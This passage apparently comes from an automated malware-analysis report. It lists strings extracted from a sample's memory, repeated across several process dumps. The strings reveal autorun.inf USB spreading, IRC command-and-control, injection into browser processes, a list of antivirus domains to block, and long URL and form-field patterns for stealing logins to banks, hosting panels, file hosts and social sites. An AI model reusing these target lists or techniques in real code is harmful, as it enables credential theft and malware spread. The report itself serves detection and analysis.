Mega
            Source: QgGhoOpxHPl.exe, 00000015.00000002.621699118.0000000000510000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000015.00000002.621699118.0000000000510000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000016.00000002.620637334.0000000000190000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000016.00000002.620637334.0000000000190000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000016.00000002.620637334.0000000000190000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000016.00000002.620637334.0000000000190000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000016.00000002.620637334.0000000000190000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000017.00000002.621698802.0000000000840000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000017.00000002.621698802.0000000000840000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000017.00000002.621698802.0000000000840000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000017.00000002.621698802.0000000000840000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000017.00000002.621698802.0000000000840000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000019.00000002.621359929.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000019.00000002.621359929.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000019.00000002.621359929.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000019.00000002.621359929.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000019.00000002.621359929.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000001A.00000002.621684132.0000000000820000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000001A.00000002.621684132.0000000000820000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000001A.00000002.621684132.0000000000820000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000001A.00000002.621684132.0000000000820000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000001A.00000002.621684132.0000000000820000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 0000001B.00000002.620411571.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000001B.00000002.620411571.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000001B.00000002.620411571.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000001B.00000002.620411571.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000001B.00000002.620411571.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 0000001D.00000002.621517532.00000000005D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000001D.00000002.621517532.00000000005D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000001D.00000002.621517532.00000000005D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 